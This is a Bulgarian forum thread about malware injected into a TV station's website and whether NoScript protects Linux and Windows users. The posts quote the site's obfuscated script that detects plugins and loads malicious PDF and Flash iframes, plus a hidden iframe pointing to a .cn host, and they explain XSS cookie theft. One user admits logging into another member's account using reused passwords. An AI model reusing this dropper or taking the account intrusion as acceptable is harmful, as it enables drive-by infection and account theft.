Jump to content
BulForum.com

Не мога да отворя сайта на Нова Телевизия


Recommended Posts

Годфадър, нищо лично, но продължаваш да се хващаш за 'буквата' и да интерпретираш всичко много буквално :) .

Няколко пъти загатнах, че приказките ми в тази тема са по-скоро от общ характер. Признах си, че с линукс нито съм се занимавал усилено, нито имам особено желание.

 

1. Изобщо не ме засягаш, колкото и директно да казваш нещата. Много добре знам как се приемат нещата, които пиша :) .

2. Не съм чак толкова опитен програмист, и никога не съм твърдял. Просто понякога може да оставям подобно грешно впечатление B)

3. В случая изобщо не съм знаел дали е буферно препълване свързано с тези експлоити, говорех в общия случай - ПРОСТО използвах темата за да кажа общи неща, за което вече съжалявам, подметнах, че и Линукс може да е уязвим, и някои хора ме погнаха като приеха нещата лично и буквално.

В тази връзка - "тезата" ми за този, който е писал OS, не знам какво толкова има за схващане - беше във връзка с това, че само човек, обвързан по-директно с разработването ѝ може да изказва по-покрепени с "кодови" факти мнения, свързани с това доколко уязвима е тя. И ДОРИ ТОЙ не може да го каже, всеки програмист знае, че дори той самия не си знае със точно всикчи възможно уязвимости в кода, който пише. Въпреки стройната оргранизация при създаването на една OS (поне на Windows).

 

За Уин2008, никъде не съм твърдял, че е най-супер ОС-а, и че е най-добрата на този свят, по-добра от Линукс и т.н. Ако съм подмятал разни неща, те са били с друга цел. По-скоро заради дразнещото "снизходително" отношение на някои хора, които имат 'самочувствието' на големи разбирачи на Линукс и точно едва ли не той е най-добрия OS. Едва ли не да те потупват по рамото видите ли "стой си s Win момче и не се бъркай при големите". Те пък едни големи...

Да, Уин е уязвим, на всеки е ясно, "тезата" ми беше друга, но както и да е, няма да я повтарям хиляди пъти.

 

:) Та така, само не разбрах кое точно от мисленето ми е свързано с бълването на охарактеризиран по определен начин от теб, код от "колегите" ми? Точно аз, който твърди, че дори Линукс е уязвим, вероятно повече отколкото си мислите?

 

Пийс и със здраве :D .

 

А дали пък този форум не стана твърде скучен, и отчасти всичко ставащо в тази тема не се дължи на просто начин човек да се посмее над себе си и другите?!... :bgrin:

Link to comment
Share on other sites

  • Replies 51
  • Created
  • Last Reply

Ами ти говореше конкретно по този случай, а именно, че освен експлоатирането на уиндоус машини от въпросния сайт (което обикновено става с буферно препълване, защото това е класическата схема за изпълнение на произволен код в контекста на потребителя) било наблюдавано и експлоатирането на линукс такива. Сам разбираш, че това на практика е меко казано невъзможно. То няма как принципно един експлоит да работи дори при XP и Vista, какво остава да го прилагаме за Линукс - изобщо смешни неща. Сега се опитваш да ми кажеш, че си говорил за някакви си съвсем общи принципи. Айде холан. Върни се назад и си прочети конкретно какво си написал. Иначе и на бебетата сигурно е ясно, че няма неуязвима ОС и да си говорим ей така общи работи е несъстоятелно.

Конкретно в подобни ситуации, независимо от платформата, един от най-добрите подходи е изплозването на Firefox+NoScript. Лично аз не браузвам по друг начин. Изпълнението на скриптове, както и обработката на flash, pdf и прочее по дефоулт при мен е забранена изрично. Позволявам изпълнението на подобни глупости само, след като съм се убедил лично в безопасното им съдържание. Повечето сайтове, които настояват за подобни глупости и навигацията им е невъзможна без изпълнението на една камара скриптове и AJAX хубавини с препратки извън текущия домейн просто ги шкартирам и захвърлям на боклука. :laughing:

Link to comment
Share on other sites

Вие вече се оакахте чесно от един сайт кво стана а от целия спор не виждам поне да сте споменали какво причинява това заразяване, за което говорехте, че то това ми е по интересно...

Link to comment
Share on other sites

Вие вече се оакахте чесно от един сайт кво стана а от целия спор не виждам поне да сте споменали какво причинява това заразяване, за което говорехте, че то това ми е по интересно...

Ами то е споменато каква е причината ама кой да чете. Обаче всъщност не е ли по-важно за теб да разбереш как е по-добре да се предпазиш от подобни набези? То всъщност и за това има написан отговор ама пак трябва четене и осмисляне.

Link to comment
Share on other sites

Вие вече се оакахте чесно от един сайт кво стана а от целия спор не виждам поне да сте споменали какво причинява това заразяване, за което говорехте, че то това ми е по интересно...

Ами Harlem, той явно и Godfather не знае какво точно се експлоатира в случая :) .

Дали е препълване или не, засега не намирам информация. Това което намерих, е че по една или друга причина, хора с линукс посетили сайта на нтв, са започнали да изпитват странно поведение. А дали е от препълване, не знам :rolleyes: . Ще следя с интерес това последното (то се подразбира).

Всеки греши понякога, да, вероятно някъде съм споменал нещо в конкретния случай, че и линукс може да е уязвим по "същия" начин като Windows - това разбира не може да е точно така, но къде видя, че съм казал, че точно windows експлоит може да "нарани" Линукс? Никъде. Никой не е казал, че само Windows експлоити има във въпросните ифреймове. Те пробват за няколко неща като флаш, адобе реадер, directX и др., това не изключва такива и за линукс. Ако говорим принципно. Така че дали е препълване или друго, явно скоро ще стане видно дали и Линукс се поразява ;) .

И да питам - цитат:

"един от най-добрите подходи е изплозването на Firefox+NoScript. Лично аз не браузвам по друг начин. Изпълнението на скриптове, както и обработката на flash, pdf и прочее по дефоулт при мен е забранена изрично. Позволявам изпълнението на подобни глупости само, след като съм се убедил лично в безопасното им съдържание."

 

- и защо тъй си май по-параноичен и от мен? :rolleyes:

Мислех, че с Линукс си по-защитен и няма нужда да забраняваш наред всичко. Не е от липса на мощност... вероятно ще кажеш, че те дразнят банерите и javascript-a на смотани сайтове...

Просто питам, не се заяждам.

 

@Harlem, не ве майна, още не се знае много, изчакай, и ако някой разбере нещо, ще пише тук. Дотогова се забраняват под ХР/2003 тия неща като адобе, що не и флаш, и т.н. за да е спокойно браузването.

Пък и както се оказа, noscript не защитава от точно тези атаки ;) Дори машина с инсталиран такъв плугин за FF се оказва, че е заразена. Явно има няколко начина за заразяване, примерно PDF да ти изобразят в браузъра не изисква JS, а най-много да цъкнеш някой линк, дори да не води точно към PDF.

Link to comment
Share on other sites

Ами то е споменато каква е причината ама кой да чете. Обаче всъщност не е ли по-важно за теб да разбереш как е по-добре да се предпазиш от подобни набези? То всъщност и за това има написан отговор ама пак трябва четене и осмисляне.

оооо съжалявам че трябваше да прочета един милион глупости които те изписаха и накрая даже ти се включи за да не ми стане ясно за какво става въпрос.мисълта ми беше че няма нужда да се зачеквате така само заради един сайт и Windows vs. Linux но вие си знаете аз спирам да флудя :)

 

П.П: Е значи можеше простичко да се обясни ето това имах предвид :)

Link to comment
Share on other sites

Пък и както се оказа, noscript не защитава от точно тези атаки ;) Дори машина с инсталиран такъв плугин за FF се оказва, че е заразена. Явно има няколко начина за заразяване, примерно PDF да ти изобразят в браузъра не изисква JS, а най-много да цъкнеш някой линк, дори да не води точно към PDF.

Е, вече почнахме наистина да си говорим за произволни глупости. Дай по-добре да минем на участието на извънземните в цялата тази епопея. Интересно е как така ги пускаш невинно кое и как се е заразило с "плугин за FF". Ама каква е "заразата", какъв е "плугина" и по какъв начин се е развило всичко са безинтересни подробности. По-важното е да се говори на парче. Теди, съжалявам, но повече с теб няма смисъл да се говори, защото не очаквах, че точно ти ще вадиш "доводи" от типа пъпчив тийнейджър се обяснява за загубата на любимия си футболен клуб.

Ето ти обяснението ми за варианта FF+noscript. Макар и в момента сайта да вади добродушното

HTTP/1.1 200 OK
Date: Mon, 08 Jun 2009 07:01:53 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/
0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 26 Feb 2009 10:33:32 GMT
ETag: "4c1ff-2d-463cfe23ef700"
Accept-Ranges: bytes
Content-Length: 45
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html><body><h1>It works!</h1></body></html>

Ако трябва да съдим по публикувания код на предишната страница, то още прехвърлянето на заявката към китайския адрес ще бъде тутакси блокирано от NoScript дори и ако допуснем, че домейна ntv.bg е включен в списъка с изключенията, защото точно в този случай няма как китайския домейн hugetoplocate.cn:8080 да е включен в този сисък (освен ако не допуснем пълен кретенизъм при въпросния юзър). Ето защо последващия код няма как да бъде изпълнен при работещ NoScript плъгин на FF. В този случай трябва да се преодолее и още една бариера - изпълнението на Adobe плъгина, отново блокирано от NoScript:

 

<html>
  <body>
		<script>
				eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c-
-){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c])
{p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g 5(){m{l(i=0;i<=8.7.j;i++){2=8.7[i].2;a((2.4("6 k")!=-1
)||(2.4("6 r")!=-1)){9.b(\'<3 c="d/p.q"></3>\')}a(2.4("o")!=-1){9.b(\'<3 c="d/n.f"></3>\')}}}h(e){}}5();',28,28,'||name|
iframe|indexOf|Ofq42i|Adobe|plugins|navigator|document|if|write|src|cache||swf|f
unction|catch||length|Acrobat|for|try|fl
ash|Flash|readme|pdf|PDF'.split('|'),0,{}))
									   </script>
												</body>

 

Ta така, Теди, небрежното ти споменаване, че имало FF+NoScript потребители, претърпяли някакво заразяване (освен ако не са включили малоумно опцията "Allow Scripts Globally) е меко казано леймърско изхвърляне по темата.

Link to comment
Share on other sites

В момента при мен вади добродушно следното (без хедърите):

<body><iframe src="http://globalnameshop.cn:8080/index.php" width=120 height=131 style="visibility: hidden"></iframe>
Сайтът е в процес на обновление..

и т.н. ;)

Така че помисли пак преди да говориш. Разликата във времето между мен и теб когато си видял какво показва е няколко минути. При мен това седи от вчера. Текстът с It Works! го гледах преди 2 дни, оттогава се смени поне 3 пъти.

И така да питам, уважаеми Godfather (наистина те уважавам въпреки че може и да се съмняваш :) ), според Вас не е ли възможно на някого ифрейма (а може и да не е ифрейм) да върне код/хтмл, който не е JS? :)

Тогава какво прайм, пак разчитаме на Noscript ли.. Толкова за леймърските изхвърляния.

Именно за тези случаи говорех. В случая който си дал като код, разбира се че това е замаскирано с JS и блокиране на скриптовете ще го спре. Трябва да съм уникален идиот за да твърдя обратното. Но ти отново се хвана за буквата. Е, имай предвид, че има хиляди (може би стотици айде) .cn домейни, които сеят зарази от различен вид. И защо продължаваме с дребни глупости да се занимаваме, макар че са точно по темата и не мисля, че е спам..

Целият спор беше породен от това, че обърнах внимание, че и Линукс не е тотално защитен докато не се разбере повече за случая. и да се внимава.

Ти пак не отговори защо толкова си се оградил с изключени плъгини и аддони :) . А да, може би не смяташ за нивото ти да отговаряш на човек като мен, ми нищо, не се сърдя, ако не отговориш, по-добре даже за мен :) .

 

Edit: Четейки едно друго място, се сетих нещо..

Представи си, че посещаваше често сайта ntv . bg :) . Със сигурност този сайт щеше да ти е вкаран вече в white list-a на Nо-Sкрипт.

Другото оставям без коментар, особено ако въпросните експлоити бяха директно качени на сайта на Нова (което е ясно че е възможно много лесно след като вече имат достъп) ;) .

Link to comment
Share on other sites

Представи си, че посещаваше често сайта ntv . bg :) . Със сигурност този сайт щеше да ти е вкаран вече в white list-a на Nо-Sкрипт.

Другото оставям без коментар, особено ако въпросните експлоити бяха директно качени на сайта на Нова (което е ясно че е възможно много лесно след като вече имат достъп) ;) .

Ако баба беше мъжка, продължението го знаеш. Много интересен начин на спор водиш, Теди. Първо, правиш определено невярни сравнения по един частен случай, след което мъдро вкарваш общата максима, която и бебетата я знаят, че всичко е уязвимо и на всичко се намира цаката, като по този начин се опитваш да оправдаеш нелепостите казани в началото. Е, не става така. За тези, които все още се опитват да мислят с главите си остава простичкия факт, че от платформено-независима гледна точка, най-сигурния начин за браузване е FF+NoScript. Още по-сигурно е използването на непривилегирован акаунт под линукс, не само защото няма толкова лесно да позволи експлоатирането в контекста на непривилегирован юзър, но и поради простия факт, че повечето client-side експлоити са правени за уиндоус. Това в конкретния случай за браузване на съмнителни сайтове. А иначе максимата, че всичко е уязвимо не е необходимо да я повтаряш - очевидно на теб не ти върши работа.

Link to comment
Share on other sites

За мен този спор изобщо не е бил сериозен и не съм се впуснал в него за да споря с теб или някой друг със някакви сериозни доводи и факти.

То си личи от километри, че не ми е било това и целта.

Много ясно, че някъде може да издишат изказванията ми. Модератор си, ако искаш, изтрий всичко, което съм писал, изобщо не ми пука, наистина. Идеята ще потретя, беше че и хората с нещо != Windows е добре да внимават, не се знае и тях какво може да ги порази от въпросните експлоити.

Ако бях решил да споря качествено, щях и да внимавам повече и нямаше да има хващане за буквата и всичко буквално да се възприема. Така като гледам, продължаваш да повтаряш едно или две неща, които някъде в едно изречение съм казал (за това че с еднаква сила може да порази и линукс мисля беше). Така казани, вероятно не ги одобряваш, Ок, твое мнение как виждаш нещата. Не забравяй че всичко е относително, има различни измерения, и никога нищо на този свят не може да се твърди с 100% сигурност. Аз ако съм го направил някъде, не падай до нивото ми тогава :) .

Със здраве.

Link to comment
Share on other sites

Еййй какъв хубав лаф-моабед сте си заформили пък аз даже не успях да се включа че цял уикенд бях зает да пия бира и да плюскам пържоли и най-вече да спя - ох кеффф :)

 

Мерси за разясненията - не бях се усетил че на Нова са ѝ хакнали сайта а после са го blacklist-нали IP-то им от доставчика ми (умен ход от тяхна страна - евала за което!)

Link to comment
Share on other sites

Дайте някаква здрава антивирусна за Линукс, че ме хвана параноята. А единствената която намирам пощи трафика за уиндос (л)юзерите :lol:

 

Теди, ти май не схващаш значението на root акаунта. Общо взето няма операция свързана с промяна на ОС, инсталирани пакети та даже и шарении по десктопа, без да удостовериш, че имаш роот права, като си напишеш роот паролата. По никакъв друг начин никой не може да ползва роот акаунта за да ти се рови в системата. Всъщност това ти би трябвало да го знаеш, но от писаниците ми става ясно, че или си го забравил или се правиш, че не го знаеш ;)

Link to comment
Share on other sites

Дайте някаква здрава антивирусна за Линукс, че ме хвана параноята. А единствената която намирам пощи трафика за уиндос (л)юзерите :lol:

На този етап FF+NoScript ще ти бъде далеч по-полезна комбинация за предпазване от подобни атаки. Изисква обаче разумен подход към работата с постоянните и временни уайтлисти. На доста хора това им се струва досадно, нервят се от факта, че доста сайтове не излизат красиво при първо зареждане или изобщо не излизат и накрая премахват плъгина. Е, мен красотата не ме интересува и предпочитам сигурността. :lol:

Link to comment
Share on other sites

Дайте някаква здрава антивирусна за Линукс, че ме хвана параноята. А единствената която намирам пощи трафика за уиндос (л)юзерите :lol:

Що ти е антивирусна бе :) .

Теди, ти май не схващаш значението на root акаунта. Общо взето няма операция свързана с промяна на ОС, инсталирани пакети та даже и шарении по десктопа, без да удостовериш, че имаш роот права, като си напишеш роот паролата. По никакъв друг начин никой не може да ползва роот акаунта за да ти се рови в системата. Всъщност това ти би трябвало да го знаеш, но от писаниците ми става ясно, че или си го забравил или се правиш, че не го знаеш ;)

Кое съм забравил точно, че не разбрах? Че root е нужен за промени на OS, или че root МОЖЕ всичко по системата? Или че по дефолт потребителите НЕ ползват root? Че не се разбра какво точно си разбрал, че аз не съм разбрал. Вече съм почти сигурен, че и ти не четеш внимателно.

 

На този етап FF+NoScript ще ти бъде далеч по-полезна комбинация за предпазване от подобни атаки. Изисква обаче разумен подход към работата с постоянните и временни уайтлисти. На доста хора това им се струва досадно, нервят се от факта, че доста сайтове не излизат красиво при първо зареждане или изобщо не излизат и накрая премахват плъгина. Е, мен красотата не ме интересува и предпочитам сигурността. :lol:

Godfather, в случая не ти отговарям поради изпитвана нужда, а по инерция, щото сте с последните два поста и бях длъжен просто :bgrin:

Хубаво е че споменаваш "атаки" в контекста на Линукс. Вече ще спя спокойно.

Доста други хора не биха посмели да го направят :tongue

Това с whitelists е наистина досадно, и наистина доста хора точно това правят в крайна сметка - махат го. JS е нещо, което е нужно в огромна част от сайтовете, и не е нещо лошо. Това, което поне 10 пъти се опитвах да кажа, и ти го знаеш, е че JS макар че в случая е входната точка за тия вируси тука, далеч не е пролуката/дупката, по която влизат, в другия смисъл. Ако другите врати, до които опира атаката, са залостени, това е по-важното. JS аз едва ли някога бих забранил с подобен плъгин, защото наистина поне 90% от сайтовете в които влизам, не работят пълноценно без него. И коментарът ти преди, че ако баба ти била мъжка.. е меко оказано неуместен. Много добре знаеш, че и без JS тия бацили могат да те налазят, ако атакуваха и Линукс, въпреки че още не е известно дали го правят..

Е, аз си признавам - изключих Flash-a. Изключих и Quicktime плугин-а, Java (не съм засичал скоро да ми е била нужна), PDF отварянето в браузъра винаги е било изключено. Хубавото е, че FF не изисква рестарт ако трябва да включа временно Флаш за някой сайт.

IE поддържа бял лист за Флаш, и там е по-лесно с него.

И всичко това, защото знам, че Windows наистина е по-уязвим, все пак почти всички съществуващи експлоити са за него.

Просто не бих изключил javascript, не съм чул скоро за пробив през браузър само през чист JS. Едно време имаше такива. Даже един приятел ми натресе за пример един такъв още по времето на IE6, и ако не ми беше приятел, щях да го наредя хубаво. Пък и едва ли някога щях да вляза в сайт и да ми се натресе точно същия експлоит (беше нещо подобно на това сега, стартираш телнет в бекграунд или нещо такова, относително безобидно, беше демо само).

Link to comment
Share on other sites

Просто не бих изключил javascript, не съм чул скоро за пробив през браузър само през чист JS.

Е, очевидно не си чувал за най-разпространените атаки в интернет, базирани на т.нар. Cross-Site Scripting уязвимости. Не е задължително някой или нещо да ти инсталира троянски кон или вирус, за да осъществи успешна атака спрямо теб. Например използвайки CSS уязвимост в платформата на форум като този аз бих могъл да открадна автентикацията ти към системата и да се логна от твое име. Всичко това базирано само на JS и без изобщо да атакувам машината ти (освен JS контекста на браузъра ти).

И още нещо - NoScript не премахва JS, а само ти дава инструмент, чрез който да контролираш лично откъде, кога и по какъв начин да се изпълняват JS скриптовете от даден домейн. И не само JS скриптовете, но и всички потенциално опасни обекти като Flash, PDF, movie clips etc. Та така, аз лично предпочитам да държа изкъсо юздите на JS, поради което се радвам на спокоен и здрав сън. :lol:

Link to comment
Share on other sites

Е, очевидно не си чувал за най-разпространените атаки в интернет, базирани на т.нар. Cross-Site Scripting уязвимости. Не е задължително някой или нещо да ти инсталира троянски кон или вирус, за да осъществи успешна атака спрямо теб. Например използвайки CSS уязвимост в платформата на форум като този аз бих могъл да открадна автентикацията ти към системата и да се логна от твое име. Всичко това базирано само на JS и без изобщо да атакувам машината ти (освен JS контекста на браузъра ти).

И още нещо - NoScript не премахва JS, а само ти дава инструмент, чрез който да контролираш лично откъде, кога и по какъв начин да се изпълняват JS скриптовете от даден домейн. И не само JS скриптовете, но и всички потенциално опасни обекти като Flash, PDF, movie clips etc. Та така, аз лично предпочитам да държа изкъсо юздите на JS, поради което се радвам на спокоен и здрав сън. :lol:

Ок, тук се съгласявам с теб.

Но отново - сайт, на който уж вярваш, посещаваш всеки ден, позволил си му JS, но в един момент се оказва, че именно този trusted site ти нахаква нещо. Това не те ли плаши?

 

Да, и би ли го направил, ако както каза, " аз бих могъл да открадна автентикацията ти към системата и да се логна от твое име." ?

Т.е. да ми демонстрираш някак, как би го направил. Наистина питам. Със секюрити не съм се занимавал сериозно, нито имам време да съм запознат с конкретните реализации на всяка уязвимост, макар и като тази известна, за която говориш.

Просто ми е интересно. Разбира се ме предупреди ако смяташ да ме атакуваш директно.

Мерси.

Link to comment
Share on other sites

Ок, тук се съгласявам с теб.

Но отново - сайт, на който уж вярваш, посещаваш всеки ден, позволил си му JS, но в един момент се оказва, че именно този trusted site ти нахаква нещо. Това не те ли плаши?

 

Да, и би ли го направил, ако както каза, " аз бих могъл да открадна автентикацията ти към системата и да се логна от твое име." ?

Т.е. да ми демонстрираш някак, как би го направил. Наистина питам. Със секюрити не съм се занимавал сериозно, нито имам време да съм запознат с конкретните реализации на всяка уязвимост, макар и като тази известна, за която говориш.

Просто ми е интересно. Разбира се ме предупреди ако смяташ да ме атакуваш директно.

Мерси.

Ако търсиш абсолютната сигурност няма да я намериш. Или по-точно ще я намериш само ако издърпаш захранващия кабел на компютъра от контакта (като също така извадиш и батерията на лаптопа). :lol:

Факт е обаче, че инструменти като NoScript намалят значително риска, ако се използват разумно, което е важния момент в този случай.

Принципа на XSS е сравнително прост. Уязвимостта се характеризира в това да можеш да вмъкнеш собствен код, който след това да се изпълни в контекста на браузъра на потребител, който посещава даден URL. Ако например някакъв форум притежава подобна уязвимост, аз мога да вмъкна JS код, който да ми изпрати твоето куки, свързано с домейна, когато кликнеш на съответния линк. Както се сещаш, автентикационната информация, която ти позволява да се логваш автоматично, без да въвеждаш всеки път име и парола се съдържа точно в кукитата. Мисля и сам може да се сетиш какъв трябва да е JS кода, който да ми прати кукито ти, с което аз по-късно успешно да се логна от твое име. Всъщност тънкия момент изобщо не е в писането на съответния JS код, защото той е сравнително елементарен. Ключът за бараката е да можеш да откриеш конкретната XSS уязвимост в даден сайт (било то форум, блог или каквото там е), която да ти даде възможност да вмъкнеш изпълнимия код. Ако имам време по-нататък мога да ти дам и по-конкретни примери.

Link to comment
Share on other sites

Да, това за абсолютната сигурност е може би само в главите на идеалистите. Определено не съм такъв.

 

За това, за което говориш, първо, cross site scripting не е ли отдавна намален риска, като например браузъра да не прати кукита ми от този форум, на твоя домейн, след като кукито е маркирано с този домейн ? (Ако не е маркирано, бих казал евалла на разработчиците!).

 

От друга страна сървъра също трябва да се грижи за сигурността, аз например като поддържам сесия, винаги следя и IP адреса, и се досещаш, че това, за което говориш няма как да стане, освен ако не почнеш занимания на ниско ниво да подменяш директно в IP пакетите адрес, и пак не е сигурно. Т.е. ако не следят и ИП адреса на сесията, нямам думи просто. То оставаше и да ползват URL токен за сесията, и да излиза URL-то ми дори ако цъкна външен линк в системата - тогава май най-лесно ще е за всеки да ми вземе сесията, ако така говорим.

 

Ако двете неща от горе са налице, тогава вероятно да, можеш да ми откраднеш сесията. Но това е стандартен страх (ако мога да се изразя така) на всяка една система, и принципно от нея не ме е толкова страх, защото ако тръгна да се страхувам от най-разпространените такива атаки, по-добре да не ползвам нет :) .

И пак това означава че трябва да хакнеш този форум примерно. А аз ако съм разумен, съм наясно, че такива системи като този форум не са кой знае колко сигурни, и да ми откраднеш акаунта, няма да е кой знае каква загуба, като например да ми вземеш сесията на е-банкирането ;) . Но нея малко ще ти е трудно :) .

Link to comment
Share on other sites

Теди, концепцията на XSS е малко по-различна и успешното експлоатиране зависи изцяло от наличието на съответната уязвимост в уеб сайта (визираме случая на браузър с нормално работещ JS контекст). Ето ти пример за какво става въпрос. Аз като атакуващ трябва да вмъкна следния код:

<script type="text/javascript">
alert("You r 0wned");
</script>

Сега ако съществува такава уязвимост, това ще означава, че горния код ще се изпълни автоматично, когато ти браузваш тази страница, вместо да ти излиза просто като текст. В този случай твоя браузър изпълнява кода в контекста на този домейн, което означава, че скрипта има абсолютно безпроблемен достъп до кукитата, свързани със сайта. Съвсем малко въображение ти трябва за да се сетиш как да изпратиш тази инфомрация където трябва. Естествено, този код принципно няма достъп до контекста на други домейни, т.е. не би трябвало да мога принципно да прочета кукитата ти от сесията на онлайн банкирането ти, но и за тази преграда понякога се намират пролуки. Освен това тръгвайки само от едно нищо и никакво форумно куки може да се разплетат доста интересни връзки, да се брутфорснат хешове на пароли, които както се сещаш за голям процент от наивните интернет потребители съвпадат с тези за онлайн банкирането им и пр. и пр. Не казвам, че е лесно, но има се методи и подходи, от които спокойно би загубил нормалния си сън. :lol:

Link to comment
Share on other sites

Уфф, ми така кажи де :) .

Наистина на момента не се сетих. Разбира се, че JS-а има свободен достъп до кукитата, и наистина свободно може да ги прочете в променлива примерно и да ги запрати нанякъде. Ако има достъп до това нанякъде :) .

И пак не ме уплаши, защото:

1. Изискването да хакнеш сайта и да инджектнеш код, от което принципно ми е ясно че не е трудно да се открадне сесия, пароли и идентичност. Пак опираме как е направена сесията. И отново - това е свързано с крадене на сесия и логин примерно, а не с някакъв експлоит на локалната ми машина :) . От тия съм претръпнал. Няма какво особено да се направи. JS не мога да спра на такива сайтове.

2. Паролите :) . Ясно ми е пределно, преди няколко месеца получих достъп до един потребител на този форум (булфорум) именно по този начин :D . Ползвал е същата парола и в сайтове, които поддържах, и имам база с около стотина хиляди логина. Разбира се само видях, че влизам като него, оттогава изобщо не съм и пробвал. Разбира се, че с т.нар. социално хакерство (може да бъркам точния термин) можеш много неща. Но да ползваш една и съща парола по форуми, и за банкирането си, не знам какъв трябва да си. Това е АБВ на онлайн safety.

 

Общо взето всеки си има някакво поведение онлайн, човек не може да се предпази от всичките опасности, които го дебнат, просто някои неща не зависят от него локално. В случая спора беше за JS. Та ако си го разрешил за някой сайт като банкиране или форум, ако в сайта стане нещо, малко трудно да се предпазиш, така мисля. Освен това пак опираме до степен на важност. Там където е нужна по-висока сигурност, и сайта е взел по-стриктни мерки, и по-трудно е да го хакнеш и да инджектнеш нещо, и всичко по реда си. Не че на Пейпал не му се случва чат пат да го хакнат, но на всеки се случва, и на уж най-сигурните, няма как.

Link to comment
Share on other sites

Но да ползваш една и съща парола по форуми, и за банкирането си, не знам какъв трябва да си. Това е АБВ на онлайн safety.

Ще останеш сигурно безкрайно учуден ако разбереш, че на практика броя на постъпващите по горния начин е умопомрачително голям. :)

 

 

Общо взето всеки си има някакво поведение онлайн, човек не може да се предпази от всичките опасности, които го дебнат, просто някои неща не зависят от него локално. В случая спора беше за JS. Та ако си го разрешил за някой сайт като банкиране или форум, ако в сайта стане нещо, малко трудно да се предпазиш, така мисля. Освен това пак опираме до степен на важност. Там където е нужна по-висока сигурност, и сайта е взел по-стриктни мерки, и по-трудно е да го хакнеш и да инджектнеш нещо, и всичко по реда си. Не че на Пейпал не му се случва чат пат да го хакнат, но на всеки се случва, и на уж най-сигурните, няма как.

Пак да повторя, става въпрос за значително намаляване на риска. Първо вероятността някой от сайтовете в уайтлиста ми да бъде хакнат е значително по-малка от вероятността това да се случи с някой от всичките сайтовете, които посещавам изобщо. Второ, дори и сайт от този лист да бъде хакнат, вероятността всичко по атакуващия вектор да е качено там отново е изключително малка (например в случаите на XSS ти вмъкваш само малък фрагмент от код и не можеш да ъплоаднеш троянски кон на сайта, а трябва да сложиш просто препратка към него, както беше в инцидента по тази тема), като в този случай атаката ще бъде успешно осуетена, поради невъзможността да се изпълни частта, която е в препратките към други домейни. Та така, просто риска е значително намален, макар и никога да не можеш да го изкорениш на 100%, все пак така се спи по-спокойно. :)

Link to comment
Share on other sites

:D Малко по малко стигаме до общо мнение.

С последното казано се съгласявам напълно (почти - както винаги) :bgrin: .

 

Относно паролите - не ме учудва нищо вече. Въпросните логини, с които разполагам, показват умопомрачителните пароли, с които се ползват статистически погледнато и разпределено :) . Понеже се пазят и в plain text. Не е редно но.... се пазят :) . Не става дума за кой знае какви тайни сайтове, иначе нямаше да се пазят.

Link to comment
Share on other sites

  • 3 weeks later...

Archived

This topic is now archived and is closed to further replies.


×
×
  • Create New...